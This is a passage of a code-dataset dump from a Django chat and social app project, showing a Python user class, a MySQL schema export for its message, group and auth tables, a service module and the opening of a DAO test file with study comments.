"text": "__author__ = 'user'\nclass Group_user(object):\n def __init__(self,id,time,userid,nickname,longitude,latitude,code,photo,phone):\n self.id = id\n self.time = time\n self.userid = userid\n self.nickname = nickname\n self.longitude = longitude\n self.latitude = latitude\n self.code = code\n self.photo = photo\n self.phone = phone\n\n def printout(self):\n print(\"id: \"+str(self.id)+\" time \"+str(self.time)\n +\" userid: \"+str(self.userid)+\" nickname: \"+str(self.nickname)\n +\" longitude: \"+str(self.longitude)+' latitude: '+str(self.latitude)\n + 'code : '+str(self.code)+\" photo:\"+str(self.photo)+\" phone: \"+str(self.phone))\n\n def object2dict(obj):\n d = {}\n #d['__class__'] = obj.__class__.__name__\n #d['__module__'] = obj.__module__\n d.update(obj.__dict__)\n return d"
},
{
"alpha_fraction": 0.5782706141471863,
"alphanum_fraction": 0.6305187940597534,
"avg_line_length": 44.93457794189453,
"blob_id": "6dd08241e19c1b40c421b270eb1017e36011885c",
"content_id": "d843e7e48bded97a24584b4ec3811b0189e3a7ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 24575,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 535,
"path": "/sql版本/2014.11.11-adam2014.CCCube.sql",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "/*\nNavicat MySQL Data Transfer\n\nSource Server : local\nSource Server Version : 50610\nSource Host : localhost:3306\nSource Database : adam2014\n\nTarget Server Type : MYSQL\nTarget Server Version : 50610\nFile Encoding : 65001\n\nDate: 2014-11-11 14:08:57\n*/\n\nSET FOREIGN_KEY_CHECKS=0;\n\n-- ----------------------------\n-- Table structure for adam2014_addfriend\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_addfriend`;\nCREATE TABLE `adam2014_addfriend` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_to_id` int(11) NOT NULL,\n `time` datetime NOT NULL,\n `user_from_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_addfriend_e1e8addb` (`user_from_id`),\n CONSTRAINT `adam2014_addfriend_user_from_id_64ec19e9_fk_adam2014_user_id` FOREIGN KEY (`user_from_id`) REFERENCES `adam2014_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_addfriend\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_bottlepicture\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_bottlepicture`;\nCREATE TABLE `adam2014_bottlepicture` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `usedTimes` int(11) NOT NULL,\n `tookTime` datetime NOT NULL,\n `author` varchar(32) DEFAULT NULL,\n `content` longtext NOT NULL,\n `longitude` decimal(8,5) DEFAULT NULL,\n `latitude` decimal(8,5) DEFAULT NULL,\n `user_id` int(11),\n PRIMARY KEY (`id`),\n KEY `adam2014_bottlepicture_e8701ad4` (`user_id`),\n CONSTRAINT `adam2014_bottlepicture_user_id_3dc400d6_fk_adam2014_user_id` FOREIGN KEY (`user_id`) REFERENCES `adam2014_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_bottlepicture\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_friendrelation\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_friendrelation`;\nCREATE TABLE `adam2014_friendrelation` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_to_id` int(11) NOT NULL,\n `time` datetime NOT NULL,\n `inBlackList` tinyint(1) NOT NULL,\n `remark` varchar(16) NOT NULL,\n `top` tinyint(1) NOT NULL,\n `user_from_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_friendrelation_e1e8addb` (`user_from_id`),\n CONSTRAINT `adam2014_friendrelatio_user_from_id_794f0ef3_fk_adam2014_user_id` FOREIGN KEY (`user_from_id`) REFERENCES `adam2014_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_friendrelation\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_group\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_group`;\nCREATE TABLE `adam2014_group` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(32) NOT NULL,\n `ucount` int(11) NOT NULL,\n `code` varchar(20) NOT NULL,\n `creater_id` int(11) DEFAULT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_group\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_groupmessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_groupmessage`;\nCREATE TABLE `adam2014_groupmessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `time` datetime NOT NULL,\n `group_to_id` int(11) NOT NULL,\n `message_id` int(11) NOT NULL,\n `user_from_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY 
`adam2014_groupmessage_32a1321c` (`group_to_id`),\n KEY `adam2014_groupmessage_4ccaa172` (`message_id`),\n KEY `adam2014_groupmessage_e1e8addb` (`user_from_id`),\n CONSTRAINT `adam2014_groupmessage_user_from_id_546b0f2b_fk_adam2014_user_id` FOREIGN KEY (`user_from_id`) REFERENCES `adam2014_user` (`id`),\n CONSTRAINT `adam2014_groupmessage_group_to_id_19c19ac3_fk_adam2014_group_id` FOREIGN KEY (`group_to_id`) REFERENCES `adam2014_group` (`id`),\n CONSTRAINT `adam2014_groupmessage_message_id_30b70d94_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_groupmessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_grouprelation\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_grouprelation`;\nCREATE TABLE `adam2014_grouprelation` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `time` datetime NOT NULL,\n `group_id` int(11) NOT NULL,\n `user_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_grouprelation_0e939a4f` (`group_id`),\n KEY `adam2014_grouprelation_e8701ad4` (`user_id`),\n CONSTRAINT `adam2014_grouprelation_user_id_77cf4e6d_fk_adam2014_user_id` FOREIGN KEY (`user_id`) REFERENCES `adam2014_user` (`id`),\n CONSTRAINT `adam2014_grouprelation_group_id_7bea8234_fk_adam2014_group_id` FOREIGN KEY (`group_id`) REFERENCES `adam2014_group` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_grouprelation\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_immediatelymessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_immediatelymessage`;\nCREATE TABLE `adam2014_immediatelymessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_to_id` int(11) NOT NULL,\n `time` datetime NOT NULL,\n `message_id` int(11) NOT NULL,\n `user_from_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_immediatelymessage_4ccaa172` (`message_id`),\n KEY `adam2014_immediatelymessage_e1e8addb` (`user_from_id`),\n CONSTRAINT `adam2014_immediatelyme_user_from_id_3cba2104_fk_adam2014_user_id` FOREIGN KEY (`user_from_id`) REFERENCES `adam2014_user` (`id`),\n CONSTRAINT `adam2014_immediatelym_message_id_57ccd623_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_immediatelymessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_locationmessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_locationmessage`;\nCREATE TABLE `adam2014_locationmessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `content` longtext NOT NULL,\n `message_id` int(11),\n PRIMARY KEY (`id`),\n KEY `adam2014_locationmessage_4ccaa172` (`message_id`),\n CONSTRAINT `adam2014_locationmess_message_id_623c8639_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_locationmessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_message\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_message`;\nCREATE TABLE `adam2014_message` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `time` datetime NOT NULL,\n `type` int(11) NOT NULL,\n 
`content_id` int(11) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_message\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_picturemessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_picturemessage`;\nCREATE TABLE `adam2014_picturemessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `content` longtext NOT NULL,\n `message_id` int(11) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_picturemessage_4ccaa172` (`message_id`),\n CONSTRAINT `adam2014_picturemessa_message_id_21d43d2f_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_picturemessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_textmessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_textmessage`;\nCREATE TABLE `adam2014_textmessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `content` longtext NOT NULL,\n `message_id` int(11) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_textmessage_4ccaa172` (`message_id`),\n CONSTRAINT `adam2014_textmessage_message_id_4381e645_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_textmessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_user\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_user`;\nCREATE TABLE `adam2014_user` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `password` varchar(16) NOT NULL,\n `nickname` varchar(32) NOT NULL,\n `photo` longtext NOT NULL,\n `phone` varchar(16) NOT NULL,\n `contacts_version` varchar(15) DEFAULT NULL,\n `longitude` decimal(8,5) DEFAULT NULL,\n `latitude` decimal(8,5) DEFAULT NULL,\n `code` varchar(20) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_user\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_voicemessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_voicemessage`;\nCREATE TABLE `adam2014_voicemessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `content` longtext NOT NULL,\n `message_id` int(11) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_voicemessage_4ccaa172` (`message_id`),\n CONSTRAINT `adam2014_voicemessage_message_id_65e66fe1_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_voicemessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_group\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_group`;\nCREATE TABLE `auth_group` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(80) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `name` (`name`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_group\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_group_permissions\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_group_permissions`;\nCREATE TABLE `auth_group_permissions` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n 
`group_id` int(11) NOT NULL,\n `permission_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `group_id` (`group_id`,`permission_id`),\n KEY `auth_group_permissions_0e939a4f` (`group_id`),\n KEY `auth_group_permissions_8373b171` (`permission_id`),\n CONSTRAINT `auth_group_permissi_permission_id_23962d04_fk_auth_permission_id` FOREIGN KEY (`permission_id`) REFERENCES `auth_permission` (`id`),\n CONSTRAINT `auth_group_permissions_group_id_58c48ba9_fk_auth_group_id` FOREIGN KEY (`group_id`) REFERENCES `auth_group` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_group_permissions\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_permission\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_permission`;\nCREATE TABLE `auth_permission` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(50) NOT NULL,\n `content_type_id` int(11) NOT NULL,\n `codename` varchar(100) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `content_type_id` (`content_type_id`,`codename`),\n KEY `auth_permission_417f1b1c` (`content_type_id`),\n CONSTRAINT `auth_permissi_content_type_id_51277a81_fk_django_content_type_id` FOREIGN KEY (`content_type_id`) REFERENCES `django_content_type` (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=58 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_permission\n-- ----------------------------\nINSERT INTO `auth_permission` VALUES ('1', 'Can add log entry', '1', 'add_logentry');\nINSERT INTO `auth_permission` VALUES ('2', 'Can change log entry', '1', 'change_logentry');\nINSERT INTO `auth_permission` VALUES ('3', 'Can delete log entry', '1', 'delete_logentry');\nINSERT INTO `auth_permission` VALUES ('4', 'Can add permission', '2', 'add_permission');\nINSERT INTO `auth_permission` VALUES ('5', 'Can change permission', '2', 'change_permission');\nINSERT INTO `auth_permission` VALUES ('6', 'Can delete permission', '2', 'delete_permission');\nINSERT INTO `auth_permission` VALUES ('7', 'Can add group', '3', 'add_group');\nINSERT INTO `auth_permission` VALUES ('8', 'Can change group', '3', 'change_group');\nINSERT INTO `auth_permission` VALUES ('9', 'Can delete group', '3', 'delete_group');\nINSERT INTO `auth_permission` VALUES ('10', 'Can add user', '4', 'add_user');\nINSERT INTO `auth_permission` VALUES ('11', 'Can change user', '4', 'change_user');\nINSERT INTO `auth_permission` VALUES ('12', 'Can delete user', '4', 'delete_user');\nINSERT INTO `auth_permission` VALUES ('13', 'Can add content type', '5', 'add_contenttype');\nINSERT INTO `auth_permission` VALUES ('14', 'Can change content type', '5', 'change_contenttype');\nINSERT INTO `auth_permission` VALUES ('15', 'Can delete content type', '5', 'delete_contenttype');\nINSERT INTO `auth_permission` VALUES ('16', 'Can add session', '6', 'add_session');\nINSERT INTO `auth_permission` VALUES ('17', 'Can change session', '6', 'change_session');\nINSERT INTO `auth_permission` VALUES ('18', 'Can delete session', '6', 'delete_session');\nINSERT INTO `auth_permission` VALUES ('19', 'Can add user', '7', 'add_user');\nINSERT INTO `auth_permission` VALUES ('20', 'Can change user', '7', 'change_user');\nINSERT INTO `auth_permission` VALUES ('21', 'Can delete user', '7', 'delete_user');\nINSERT INTO `auth_permission` VALUES ('22', 'Can add group', '8', 'add_group');\nINSERT INTO `auth_permission` VALUES ('23', 'Can change group', '8', 'change_group');\nINSERT INTO `auth_permission` VALUES ('24', 'Can delete group', '8', 
'delete_group');\nINSERT INTO `auth_permission` VALUES ('25', 'Can add message', '9', 'add_message');\nINSERT INTO `auth_permission` VALUES ('26', 'Can change message', '9', 'change_message');\nINSERT INTO `auth_permission` VALUES ('27', 'Can delete message', '9', 'delete_message');\nINSERT INTO `auth_permission` VALUES ('28', 'Can add text message', '10', 'add_textmessage');\nINSERT INTO `auth_permission` VALUES ('29', 'Can change text message', '10', 'change_textmessage');\nINSERT INTO `auth_permission` VALUES ('30', 'Can delete text message', '10', 'delete_textmessage');\nINSERT INTO `auth_permission` VALUES ('31', 'Can add picture message', '11', 'add_picturemessage');\nINSERT INTO `auth_permission` VALUES ('32', 'Can change picture message', '11', 'change_picturemessage');\nINSERT INTO `auth_permission` VALUES ('33', 'Can delete picture message', '11', 'delete_picturemessage');\nINSERT INTO `auth_permission` VALUES ('34', 'Can add voice message', '12', 'add_voicemessage');\nINSERT INTO `auth_permission` VALUES ('35', 'Can change voice message', '12', 'change_voicemessage');\nINSERT INTO `auth_permission` VALUES ('36', 'Can delete voice message', '12', 'delete_voicemessage');\nINSERT INTO `auth_permission` VALUES ('37', 'Can add location message', '13', 'add_locationmessage');\nINSERT INTO `auth_permission` VALUES ('38', 'Can change location message', '13', 'change_locationmessage');\nINSERT INTO `auth_permission` VALUES ('39', 'Can delete location message', '13', 'delete_locationmessage');\nINSERT INTO `auth_permission` VALUES ('40', 'Can add bottle picture', '14', 'add_bottlepicture');\nINSERT INTO `auth_permission` VALUES ('41', 'Can change bottle picture', '14', 'change_bottlepicture');\nINSERT INTO `auth_permission` VALUES ('42', 'Can delete bottle picture', '14', 'delete_bottlepicture');\nINSERT INTO `auth_permission` VALUES ('43', 'Can add immediately message', '15', 'add_immediatelymessage');\nINSERT INTO `auth_permission` VALUES ('44', 'Can change immediately message', '15', 'change_immediatelymessage');\nINSERT INTO `auth_permission` VALUES ('45', 'Can delete immediately message', '15', 'delete_immediatelymessage');\nINSERT INTO `auth_permission` VALUES ('46', 'Can add add friend', '16', 'add_addfriend');\nINSERT INTO `auth_permission` VALUES ('47', 'Can change add friend', '16', 'change_addfriend');\nINSERT INTO `auth_permission` VALUES ('48', 'Can delete add friend', '16', 'delete_addfriend');\nINSERT INTO `auth_permission` VALUES ('49', 'Can add friend relation', '17', 'add_friendrelation');\nINSERT INTO `auth_permission` VALUES ('50', 'Can change friend relation', '17', 'change_friendrelation');\nINSERT INTO `auth_permission` VALUES ('51', 'Can delete friend relation', '17', 'delete_friendrelation');\nINSERT INTO `auth_permission` VALUES ('52', 'Can add group relation', '18', 'add_grouprelation');\nINSERT INTO `auth_permission` VALUES ('53', 'Can change group relation', '18', 'change_grouprelation');\nINSERT INTO `auth_permission` VALUES ('54', 'Can delete group relation', '18', 'delete_grouprelation');\nINSERT INTO `auth_permission` VALUES ('55', 'Can add group message', '19', 'add_groupmessage');\nINSERT INTO `auth_permission` VALUES ('56', 'Can change group message', '19', 'change_groupmessage');\nINSERT INTO `auth_permission` VALUES ('57', 'Can delete group message', '19', 'delete_groupmessage');\n\n-- ----------------------------\n-- Table structure for auth_user\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_user`;\nCREATE TABLE `auth_user` (\n `id` 
int(11) NOT NULL AUTO_INCREMENT,\n `password` varchar(128) NOT NULL,\n `last_login` datetime NOT NULL,\n `is_superuser` tinyint(1) NOT NULL,\n `username` varchar(30) NOT NULL,\n `first_name` varchar(30) NOT NULL,\n `last_name` varchar(30) NOT NULL,\n `email` varchar(75) NOT NULL,\n `is_staff` tinyint(1) NOT NULL,\n `is_active` tinyint(1) NOT NULL,\n `date_joined` datetime NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `username` (`username`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_user\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_user_groups\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_user_groups`;\nCREATE TABLE `auth_user_groups` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_id` int(11) NOT NULL,\n `group_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `user_id` (`user_id`,`group_id`),\n KEY `auth_user_groups_e8701ad4` (`user_id`),\n KEY `auth_user_groups_0e939a4f` (`group_id`),\n CONSTRAINT `auth_user_groups_group_id_30a071c9_fk_auth_group_id` FOREIGN KEY (`group_id`) REFERENCES `auth_group` (`id`),\n CONSTRAINT `auth_user_groups_user_id_24702650_fk_auth_user_id` FOREIGN KEY (`user_id`) REFERENCES `auth_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_user_groups\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_user_user_permissions\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_user_user_permissions`;\nCREATE TABLE `auth_user_user_permissions` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_id` int(11) NOT NULL,\n `permission_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `user_id` (`user_id`,`permission_id`),\n KEY `auth_user_user_permissions_e8701ad4` (`user_id`),\n KEY `auth_user_user_permissions_8373b171` (`permission_id`),\n CONSTRAINT `auth_user_user_perm_permission_id_3d7071f0_fk_auth_permission_id` FOREIGN KEY (`permission_id`) REFERENCES `auth_permission` (`id`),\n CONSTRAINT `auth_user_user_permissions_user_id_7cd7acb6_fk_auth_user_id` FOREIGN KEY (`user_id`) REFERENCES `auth_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_user_user_permissions\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for django_admin_log\n-- ----------------------------\nDROP TABLE IF EXISTS `django_admin_log`;\nCREATE TABLE `django_admin_log` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `action_time` datetime NOT NULL,\n `object_id` longtext,\n `object_repr` varchar(200) NOT NULL,\n `action_flag` smallint(5) unsigned NOT NULL,\n `change_message` longtext NOT NULL,\n `content_type_id` int(11) DEFAULT NULL,\n `user_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `django_admin_log_417f1b1c` (`content_type_id`),\n KEY `django_admin_log_e8701ad4` (`user_id`),\n CONSTRAINT `django_admin_log_user_id_1c5f563_fk_auth_user_id` FOREIGN KEY (`user_id`) REFERENCES `auth_user` (`id`),\n CONSTRAINT `django_admin__content_type_id_5151027a_fk_django_content_type_id` FOREIGN KEY (`content_type_id`) REFERENCES `django_content_type` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of django_admin_log\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for django_content_type\n-- ----------------------------\nDROP TABLE IF EXISTS `django_content_type`;\nCREATE TABLE 
`django_content_type` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(100) NOT NULL,\n `app_label` varchar(100) NOT NULL,\n `model` varchar(100) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `django_content_type_app_label_3ec8c61c_uniq` (`app_label`,`model`)\n) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of django_content_type\n-- ----------------------------\nINSERT INTO `django_content_type` VALUES ('1', 'log entry', 'admin', 'logentry');\nINSERT INTO `django_content_type` VALUES ('2', 'permission', 'auth', 'permission');\nINSERT INTO `django_content_type` VALUES ('3', 'group', 'auth', 'group');\nINSERT INTO `django_content_type` VALUES ('4', 'user', 'auth', 'user');\nINSERT INTO `django_content_type` VALUES ('5', 'content type', 'contenttypes', 'contenttype');\nINSERT INTO `django_content_type` VALUES ('6', 'session', 'sessions', 'session');\nINSERT INTO `django_content_type` VALUES ('7', 'user', 'adam2014', 'user');\nINSERT INTO `django_content_type` VALUES ('8', 'group', 'adam2014', 'group');\nINSERT INTO `django_content_type` VALUES ('9', 'message', 'adam2014', 'message');\nINSERT INTO `django_content_type` VALUES ('10', 'text message', 'adam2014', 'textmessage');\nINSERT INTO `django_content_type` VALUES ('11', 'picture message', 'adam2014', 'picturemessage');\nINSERT INTO `django_content_type` VALUES ('12', 'voice message', 'adam2014', 'voicemessage');\nINSERT INTO `django_content_type` VALUES ('13', 'location message', 'adam2014', 'locationmessage');\nINSERT INTO `django_content_type` VALUES ('14', 'bottle picture', 'adam2014', 'bottlepicture');\nINSERT INTO `django_content_type` VALUES ('15', 'immediately message', 'adam2014', 'immediatelymessage');\nINSERT INTO `django_content_type` VALUES ('16', 'add friend', 'adam2014', 'addfriend');\nINSERT INTO `django_content_type` VALUES ('17', 'friend relation', 'adam2014', 'friendrelation');\nINSERT INTO `django_content_type` VALUES ('18', 'group relation', 'adam2014', 'grouprelation');\nINSERT INTO `django_content_type` VALUES ('19', 'group message', 'adam2014', 'groupmessage');\n\n-- ----------------------------\n-- Table structure for django_migrations\n-- ----------------------------\nDROP TABLE IF EXISTS `django_migrations`;\nCREATE TABLE `django_migrations` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `app` varchar(255) NOT NULL,\n `name` varchar(255) NOT NULL,\n `applied` datetime NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of django_migrations\n-- ----------------------------\nINSERT INTO `django_migrations` VALUES ('1', 'adam2014', '0001_initial', '2014-11-11 06:08:02');\nINSERT INTO `django_migrations` VALUES ('2', 'contenttypes', '0001_initial', '2014-11-11 06:08:02');\nINSERT INTO `django_migrations` VALUES ('3', 'auth', '0001_initial', '2014-11-11 06:08:03');\nINSERT INTO `django_migrations` VALUES ('4', 'admin', '0001_initial', '2014-11-11 06:08:03');\nINSERT INTO `django_migrations` VALUES ('5', 'sessions', '0001_initial', '2014-11-11 06:08:03');\n\n-- ----------------------------\n-- Table structure for django_session\n-- ----------------------------\nDROP TABLE IF EXISTS `django_session`;\nCREATE TABLE `django_session` (\n `session_key` varchar(40) NOT NULL,\n `session_data` longtext NOT NULL,\n `expire_date` datetime NOT NULL,\n PRIMARY KEY (`session_key`),\n KEY `django_session_de54fa62` (`expire_date`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- 
----------------------------\n-- Records of django_session\n-- ----------------------------\n"
},
{
"alpha_fraction": 0.7632978558540344,
"alphanum_fraction": 0.7752659320831299,
"avg_line_length": 24.89655113220215,
"blob_id": "07ecf637fc5c5c77e2678c5f26dcec39bab3b735",
"content_id": "a55222be23f4be113b0fd8ff63520b99878e6160",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 752,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 29,
"path": "/zzc/adam2014/Service/GroupRelationService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import GroupRelation\nfrom adam2014.DAO import GroupRelationDAO\n\ndef newGroupRelation(**groupRelation):\n g = GroupRelationDAO.insertGroupRelation(**groupRelation)\n return g;\n\ndef deleteGroupRelation(id):\n GroupRelationDAO.deleteGroupRelation(id)\n\ndef deleteGroupRelationByCondition(user_id,group_id):\n GroupRelationDAO.deleteGroupRelation(user_id=user_id,group_id=group_id)\n\ndef getGroupRelationById(id):\n g = GroupRelationDAO.getGroupRelationById(id)\n return g;\n\ndef updateGroupRelation(**groupRelation):\n GroupRelationDAO.updateGroupRelation(**groupRelation)\n\n"
},
{
"alpha_fraction": 0.6125311255455017,
"alphanum_fraction": 0.6842343211174011,
"avg_line_length": 45.04166793823242,
"blob_id": "1925ce7f1e77d8537e945b92e2acf86851605004",
"content_id": "b30e2af2661d24497cdc8e614fbc438944e8b95d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4885,
"license_type": "no_license",
"max_line_length": 216,
"num_lines": 96,
"path": "/zzc/adam2014/AllTest/DAOTest/testUserDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'lao605'\n\nfrom django.test import TestCase\nfrom adam2014.DAO.UserDAO import *\nfrom adam2014.models import User\n\n\n# If your tests rely on database access such as creating or querying models, \n# be sure to create your test classes as subclasses of django.test.TestCase rather than unittest.TestCase.\n# Create your tests here.\n# you can simulate requests, insert test data, inspect your application’s output and generally verify your code is doing what it should be doing.\n\n# from django.test import TestCase\n# from myapp.models import Animal\n\n# class AnimalTestCase(TestCase):\n# def setUp(self):\n# Animal.objects.create(name=\"lion\", sound=\"roar\")\n# Animal.objects.create(name=\"cat\", sound=\"meow\")\n\n# def test_animals_can_speak(self):\n# \"\"\"Animals that can speak are correctly identified\"\"\"\n# lion = Animal.objects.get(name=\"lion\")\n# cat = Animal.objects.get(name=\"cat\")\n# self.assertEqual(lion.speak(), 'The lion says \"roar\"')\n# self.assertEqual(cat.speak(), 'The cat says \"meow\"')\n\n# 怎么测试DAO\n# 增加->查->修改->删除\n\n# filter和get有什么不同\n# get不存在的会报错,filter不存在的不会报错\n# get得到的是对象,filter得到的是结果集\n\n# However, a big part of the time taken to run a Django TestCase is consumed by the call to flush that ensures that you have a clean database at the start of each test run. \n# django为我们在setting文件中database列出的每个数据库对应设置一个测试数据库\n# 每个test开始的时候都会有一个全新的数据库(包含setUp的数据),执行test很大的一个时间开支用在flush数据库\n\n# 每个DAO一个类去测试\nclass UserDAOTest(TestCase):\n def setUp(self):\n # 